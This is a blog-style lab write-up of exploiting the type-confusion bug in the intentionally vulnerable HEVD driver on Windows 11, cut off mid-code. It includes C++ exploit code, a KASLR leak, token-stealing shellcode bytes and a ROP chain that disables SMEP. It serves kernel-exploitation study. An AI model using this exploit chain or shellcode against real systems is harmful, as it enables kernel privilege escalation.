6 August 2023 at 13:10

How a simple kernel type confusion took me 3 months to exploit [HEVD] - Windows 11 (build 22621)

Have you ever tested something for so long that it became part of your life? That's what happened to me over the last few months, when a simple type confusion vulnerability almost made me go crazy!

Introduction

In this blog post, I will talk about my experience with a simple vulnerability that, for some reason, was the hardest and most confusing thing I have ever dealt with in the context of kernel exploitation.

We will cover the following topics:

  • Type confusion: We will discuss how this vulnerability impacts the Windows kernel and how, as researchers, we can manipulate it from user land in order to build an exploit that gains privileged access to the operating system.
  • ROP chain: A method to make the RIP register jump through Windows kernel addresses in order to execute code. With this technique we can manipulate the order of execution on our stack and, from there, reach user-land shellcode.
  • Kernel ASLR bypass: A way to leak kernel memory addresses; with the correct base address we can calculate the memory region we want to use later.
  • Supervisor Mode Execution Prevention (SMEP): A mechanism that blocks kernel-mode execution of user-land addresses. If it is enabled in the operating system, you cannot JMP/CALL into user land, so you cannot simply execute your shellcode directly. This protection has shipped since Windows 8.0 (32/64-bit).
  • Kernel memory management: Important information about how the kernel interprets memory, including memory paging, segmentation and data transfer, plus a description of how memory is laid out and used by the operating system.
  • Stack manipulation: The stack is the most notorious thing you will see in this blog post; all of my research relies on it, and after rebooting my VM a million times I finally understand some of the concepts you must consider when writing a stack-based exploit.

VM Setup

OS Name:             Microsoft Windows 11 Pro
OS Version:          10.0.22621 N/A Build 22621
System Manufacturer: VMware, Inc.
System Model:        VMware7,1
System Type:         x64-based PC
Vulnerable Driver:   HackSysExtremeVulnerableDriver a.k.a. HEVD.sys

Tips for Kernel Exploitation coding

Default Windows headers can often slow down exploit development, because many functions and structures ship with "protected" (incomplete) definitions intended to prevent misuse by attackers or by anyone who wants to modify or manipulate internal values. In many C/C++ sources you will find an include block like this:

#include <windows.h>
#include <winternl.h> // Don't use it
#include <iostream>
#pragma comment(lib, "ntdll.lib")
<...snip...>

When winternl.h is included, the definitions of numerous functions and structures are taken from the (reduced) versions declared in that header.

// https://github.com/wine-mirror/wine/blob/master/include/winternl.h#L1790C1-L1798C33
// snippet from wine/include/winternl.h
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemCpuInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
<...snip...>

The problem is that when you manipulate and exploit user-land functions such as NtQuerySystemInformation on "recent" Windows versions, the values defined there are different, blocking or limiting the use of functions that could leak kernel base addresses and consequently delaying our exploitation phase. So it is important to craft the code ignoring winternl.h and instead define the required structures manually, as in the example below:

#include <iostream>
#include <windows.h>
#include <ntstatus.h>
#include <string>
#include <Psapi.h>
#include <vector>

#define QWORD uint64_t

typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);

// Function pointer typedef for NtDeviceIoControlFile
typedef NTSTATUS(WINAPI* LPFN_NtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine,
PVOID ApcContext,
PVOID IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);

// Loads NTDLL library
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile function
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

INT64 GetKernelBase() {
// Leak the ntoskrnl.exe base address in order to bypass KASLR
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}

With this technique, we are now able to use all the correct struct values without any trouble.
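
As a quick sanity check, a minimal program like the sketch below (reusing the includes and the GetKernelBase() helper defined above) should print the leaked ntoskrnl.exe base address. Note that this query should only return real kernel pointers from a medium-integrity (non-sandboxed) process.

// Minimal usage sketch for the GetKernelBase() helper defined above.
int main() {
    INT64 ntBase = GetKernelBase();
    if (!ntBase) {
        std::cout << "[-] Failed to query SystemModuleInformation" << std::endl;
        return 1;
    }
    std::cout << "[+] ntoskrnl.exe base: 0x" << std::hex << ntBase << std::endl;
    return 0;
}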

TypeConfusion vulnerability

Using the IDA reverse engineering tool, we can clearly see the IOCTL that reaches our vulnerable function.

The 0x222023 IOCTL executes our TypeConfusionIoctlHandler

After reversing TriggerTypeConfusion, we have the following code:

// IDA Pseudo-code into TriggerTypeConfusion function
__int64 __fastcall TriggerTypeConfusion(_USER_TYPE_CONFUSION_OBJECT *a1)
{
_KERNEL_TYPE_CONFUSION_OBJECT *PoolWithTag; // r14
unsigned int v4; // ebx
ProbeForRead(a1, 0x10ui64, 1u);
PoolWithTag = (_KERNEL_TYPE_CONFUSION_OBJECT *)ExAllocatePoolWithTag(NonPagedPool, 0x10ui64, 0x6B636148u);
if ( PoolWithTag )
{
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%X\n", 16i64);
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] UserTypeConfusionObject: 0x%p\n", a1);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject Size: 0x%X\n", 16i64);
PoolWithTag->ObjectID = a1->ObjectID; // USER_CONTROLLED PARAMETER
PoolWithTag->ObjectType = a1->ObjectType; // USER_CONTROLLED PARAMETER
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectID: 0x%p\n", (const void *)PoolWithTag->ObjectID);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectType: 0x%p\n", PoolWithTag->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Triggering Type Confusion\n");
v4 = TypeConfusionObjectInitializer(PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] Freeing KernelTypeConfusionObject Object\n");
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
ExFreePoolWithTag(PoolWithTag, 0x6B636148u);
return v4;
}
else
{
DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
return 3221225495i64;
}
}

As you can see, the function expects two values from a user-controlled struct (_USER_TYPE_CONFUSION_OBJECT) containing ObjectID and ObjectType; after copying these fields into the kernel-side _KERNEL_TYPE_CONFUSION_OBJECT, it calls TypeConfusionObjectInitializer with our object. The vulnerable code follows below:

__int64 __fastcall TypeConfusionObjectInitializer(_KERNEL_TYPE_CONFUSION_OBJECT *KernelTypeConfusionObject)
{
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->Callback: 0x%p\n", KernelTypeConfusionObject->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Calling Callback\n");
((void (*)(void))KernelTypeConfusionObject->ObjectType)(); // VULNERABLE
DbgPrintEx(0x4Du, 3u, "[+] Kernel Type Confusion Object Initialized\n");
return 0i64;
}

The vulnerability in the code above is the unrestricted call through _KERNEL_TYPE_CONFUSION_OBJECT->ObjectType, which points to a user-controlled address.
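
To make the confusion explicit, the driver-side structures look roughly like this (paraphrased from the HEVD source; the exact field types may differ slightly). The user-mode struct stores ObjectType as a plain integer, while the kernel struct overlays the same 8 bytes with a function pointer in a union, so whatever value we supply from user land ends up being called as a callback.

// Paraphrased from HEVD's TypeConfusion header (treat as approximate).
typedef void (*FunctionPointer)(void);

typedef struct _USER_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;          // plain integer from the caller's point of view
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    union {
        ULONG_PTR ObjectType;
        FunctionPointer Callback;  // the same 8 bytes interpreted as a callback
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;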

Exploit Initialization

Knowing our vulnerability, let's now focus on the exploit phases.

First of all, we craft our code to communicate with the HEVD driver by sending an IRP with the previously identified IOCTL (0x222023), and then we send our malicious buffer.

<...snip...>
// ---> Malicious Struct <---
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};

HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

HANDLE setupSocket() {
// Open a handle to the target device
HANDLE deviceHandle = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
nullptr
);
if (deviceHandle == INVALID_HANDLE_VALUE) {
//std::cout << "[-] Failed to open the device" << std::endl;
FreeLibrary(ntdll);
return FALSE;
}
return deviceHandle;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = 0xDEADBEEFDEADBEEF; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}

int main() {
exploit();
return 0;
}

Then, after we send our buffer, _KERNEL_TYPE_CONFUSION_OBJECT should look like this.

0xdeadbeefdeadbeef address is our callback for the moment
[CALL]ing 0xdeadbeefdeadbeef

Now we can clearly understand where exactly this vulnerability lies. The next step would be to JMP into a user-controlled buffer containing shellcode that escalates to SYSTEM privileges; the issue with this idea is a protection mechanism called Supervisor Mode Execution Prevention, a.k.a. SMEP.

Supervisor Mode Execution Prevention (SMEP)

The main idea behind the SMEP protection is to prevent CALL/JMP into user-land addresses from kernel mode. If the SMEP bit in CR4 is set to 1, it provides a security mechanism that protects memory pages from this kind of attack.

According to Core Security,

SMEP: Supervisor Mode Execution Prevention allows pages to be protected from supervisor-mode instruction fetches. If SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode.
- Detects RING-0 code running in USER SPACE
- Introduced at Intel processors based on the Ivy Bridge architecture
- Security feature launched in 2011
- Enabled by default since Windows 8.0 (32/64 bits)
- Kernel exploit mitigation
- Specially "Local Privilege Escalation" exploits must now consider this feature.

Then let’s see in a pratical test if it is actually working properly.

<...snip...>
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)shellcode; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>

After executing the exploit, we get something like this:

SMEP seems to be working properly

The BugCheck analysis should look similar to the following:

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory. The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name is printed on
the BugCheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 0000000080000000, Virtual address for the attempted execute.
Arg2: 00000001db4ea867, PTE contents.
Arg3: ffffb40672892490, (reserved)
Arg4: 0000000080000005, (reserved)
<...snip...>

As we can see, the SMEP protection is working as intended. The following steps cover how we can manipulate our addresses so that the processor is allowed to execute our shellcode buffer.

Return-Oriented Programming against SMEP

Return-Oriented Programming, a.k.a. ROP, is a technique that allows an attacker to manipulate instruction pointers and return addresses on the current stack. With this type of attack we can effectively program in assembly using nothing but jumps from address to address.

As CTF101 mentioned:

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don’t have a convenient give_shell function however, so we need to find a way to manually invoke system or another exec function to get us our shell.

The main idea of our exploit is to use a ROP chain to achieve arbitrary code execution. But how?

x64 CR4 register

CR4 is one of the control registers; it holds a set of bit flags whose values can vary between operating systems.

When SMEP is implemented, the corresponding CR4 bit tells the CPU whether SMEP is currently enabled, and with this information the kernel knows whether, during its execution, it is allowed to CALL/JMP into user-land addresses.

As Wikipedia says:

A control register is a processor register that changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control.
CR4
Used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.

On my operating system build (Windows 11 22621) we can clearly see this register value in WinDBG:

CR4 value before ROP Chain

For now, the main idea is to flip the correct bit in order to neutralize SMEP, and after that JMP into the attacker's shellcode.

SMEP turning off through bit flip: 001[1]0101 -> 001[0]0101
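
The flip targets CR4.SMEP, which is bit 20 of CR4 (per the Intel SDM). Below is a small sketch of the arithmetic used later in the exploit; the value 0x3506f8 is simply the CR4 contents observed in WinDBG on this specific VM and will differ on other machines, so treat the constant as an assumption.

// CR4.SMEP is bit 20. DisableSmepValue() clears it explicitly; the exploit
// below uses 0x3506f8 ^ (1UL << 20), which is equivalent only because the
// bit is known to be set in the observed value.
constexpr unsigned long long CR4_SMEP_BIT = 1ULL << 20;

unsigned long long DisableSmepValue(unsigned long long cr4) {
    return cr4 & ~CR4_SMEP_BIT;
}
// Example: DisableSmepValue(0x3506f8) == 0x2506f8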

With this in mind, we need to get back to our exploit source code and craft a ROP chain to achieve our goal. The question is: how?

At this point we know that we need to change the CR4 value and that a ROP chain can help us; we also first need to bypass kernel ASLR due to the randomization of kernel addresses. The following steps cover how to get the correct gadgets for the attack.

Virtualization-based security (VBS)

When manipulating the CR4 register through a ROP chain, it is important to notice that if the attacker miscalculates the value during the bit-flip phase and Virtualization-based Security is enabled, the system catches the exception and crashes after the attempted change of the CR4 register.

According to Microsoft:

Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEP field, are blocked instantly.

If for some reason you see an error like the one below, it is probably a miscalculation of the value that should be placed into the CR4 register.

<...snip...>
// An example of a miscalculated CR4 value
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0xFFFFFF; // ---> WRONG CR4 value
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>

WinDBG output:

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000004, The thread's stack pointer was outside the legal stack
extents for the thread.

Arg2: 0000000047fff230, Address of the trap frame for the exception that caused the BugCheck
Arg3: 0000000047fff188, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
EXCEPTION_RECORD: 0000000047fff188 -- (.exr 0x47fff188)
ExceptionAddress: fffff80631091b99 (nt!RtlpGetStackLimitsEx+0x0000000000165f29)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000004
Subcode: 0x4 FAST_FAIL_INCORRECT_STACK
PROCESS_NAME: TypeConfusionWin11x64.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system has detected a stack-based buffer overrun in this application. It is possible that this saturation could allow a malicious user to gain control of the application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 0000000000000004
EXCEPTION_STR: 0xc0000409

KASLR Bypass with NtQuerySystemInformation

As mentioned before, NtQuerySystemInformation is a function that, if configured correctly, can leak kernel module base addresses when performing system query operations. From the results of these queries we can leak kernel addresses from user land.

As mentioned by Trustwave:

The function NTQuerySystemInformation is implemented on NTDLL. And as a kernel API, it is always being updated during the Windows versions with no short notice. As mentioned, this is a private function, so not officially documented by Microsoft. It has been used since early days from Windows NT-family systems with different syscall IDs.
<…snip…>
The function basically retrieves specific information from the environment and its structure is very simple
<…snip…>
There are numerous data that can be retrieved using these classes along with the function. Information regarding the system, the processes, objects and others.

So now we have a question: if we can leak addresses and calculate the correct offsets from the leaked base to our gadgets, how do we search memory for those gadgets?

The solution is simple as follows:

1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt

With the rop.txt file we have addresses, but we are still "unable" to get the correct ones to implement a valid calculation.

The nt module (ntoskrnl.exe), for example, sometimes uses addresses inside its own image as "buffers", and the data can point somewhere invalid. At kernel level, functions "change", and between all these "changes" you will never hit the correct offset through a simple .writemem dump.

The biggest issue is that when .writemem is used, it dumps the start and end of a defined module, but it does not correctly align the offsets of functions. This happens because of module segments and mutable data, which can change over time as the OS runs. For example, if we search for opcodes using the WinDBG command line, there is a static buffer address that returns exactly the opcodes we searched for.

WinDBG opcode searching

The addresses above seem valid, and they match our opcodes; the problem is that 0xfffff80051ef8500 is a buffer, and it echoes back everything we put into the WinDBG search function (the s command). So no matter how you change the opcodes, they always come back in that buffer.

WinDBG opcode searching

Ok, now let’s say that ROPGadget.py return as the follow output:

--> 0xfffff800516a6ac4 : pop r12 ; pop rbx ; pop rbp ; pop rdi ; pop rsi ; ret
0xfffff800514cbd9a : pop r12 ; pop rbx ; pop rbp ; ret
0xfffff800514d2bbf : pop r12 ; pop rbx ; ret
0xfffff800514b2793 : pop r12 ; pop rcx ; ret

If we check whether those opcodes are the same in our running VM, we notice something like this:

Inspecting 0xfffff800516a6ac4 address

As you can see, the offset from .writemem is invalid, meaning that something went wrong. A simple fix is to look at our ROP gadgets, pick the assembly code we need, convert it into opcodes, and then search the live, valid memory for those bytes to find the addresses to start our ROP chain.

4 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
5 - kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
6 - kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
7 - kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0

Now we know that the nt (ntoskrnl.exe) base address 0xfffff80051200000 + 0x2ce4c0 resolves to the nt!ExfReleasePushLock+0x20 gadget.

Stack Pivoting & ROP chain

With the previous idea of what exactly a ROP chain means, it is important to know which gadgets we need in order to change the CR4 register value using only kernel addresses.

STACK PIVOTING:
mov esp, 0x48000000

ROP CHAIN:
POP RCX; ret // Just "pop" our RCX register to receive values
<CR4 CALCULATED VALUE> // Calculated value of current OS CR4 value
MOV CR4, RCX; ret // Changes current CR4 value with a manipulated one

// The logic for the ROP chain
// 1 - Allocate memory in the 0x48000000 region
// 2 - When we move the 0x48000000 address into our ESP/RSP register,
//     we control the range of addresses that will be [CALL/JMP]ed.

Now that we know our ROP chain logic, we need to discuss the stack pivoting technique.

Stack pivoting basically means replacing the current kernel stack with a user-controlled fake stack; this is possible by changing the RSP register value. When we point RSP at a user-controlled stack we can manipulate execution through a ROP chain, since we can then "program" by returning into kernel addresses. Note that because our pivot gadget ends with add esp, 0x28 ; ret, the ROP chain itself has to be written starting at 0x48000000 + 0x28.

Getting back to the code, we implement our attacker-controlled fake stack.

<...snip...>
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};
typedef struct _SMEP {
INT64 STACK_PIVOT;
INT64 POP_RCX;
INT64 MOV_CR4_RCX;
} SMEP;
<...snip...>
// Leak base address utilizing NtQuerySystemInformation
INT64 GetKernelBase() {
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
SMEP SMEPBypass = { 0 };
int SMEPBypassInitializer() {
INT64 NT_BASE_ADDR = GetKernelBase(); // ntoskrnl.exe
std::cout << std::endl << "[+] NT_BASE_ADDR: 0x" << std::hex << NT_BASE_ADDR << std::endl;
INT64 STACK_PIVOT = NT_BASE_ADDR + 0x002ce4c0;
SMEPBypass.STACK_PIVOT = STACK_PIVOT;
std::cout << "[+] STACK_PIVOT: 0x" << std::hex << STACK_PIVOT << std::endl;
/*
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
*******************************************************************************
kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
*/
INT64 POP_RCX = NT_BASE_ADDR + 0x0021d795;
SMEPBypass.POP_RCX = POP_RCX;
std::cout << "[+] POP_RCX: 0x" << std::hex << POP_RCX << std::endl;
/*
kd> s fffff800`51200000 L?01047000 41 5C 59 C3
fffff800`5141d793 41 5c 59 c3 cc b1 02 e8-21 06 06 00 eb c1 cc cc A\Y.....!.......
fffff800`5141f128 41 5c 59 c3 cc cc cc cc-cc cc cc cc cc cc cc cc A\Y.............
fffff800`5155a604 41 5c 59 c3 cc cc cc cc-cc cc cc cc 48 8b c4 48 A\Y.........H..H
kd> u fffff800`5141d795
nt!KeClockInterruptNotify+0x2ff5:
fffff800`5141d795 59 pop rcx
fffff800`5141d796 c3 ret
kd> ? fffff800`5141d795 - fffff800`51200000
Evaluate expression: 2217877 = 00000000`0021d795
*/
INT64 MOV_CR4_RCX = NT_BASE_ADDR + 0x003a5fc7;
SMEPBypass.MOV_CR4_RCX = MOV_CR4_RCX;
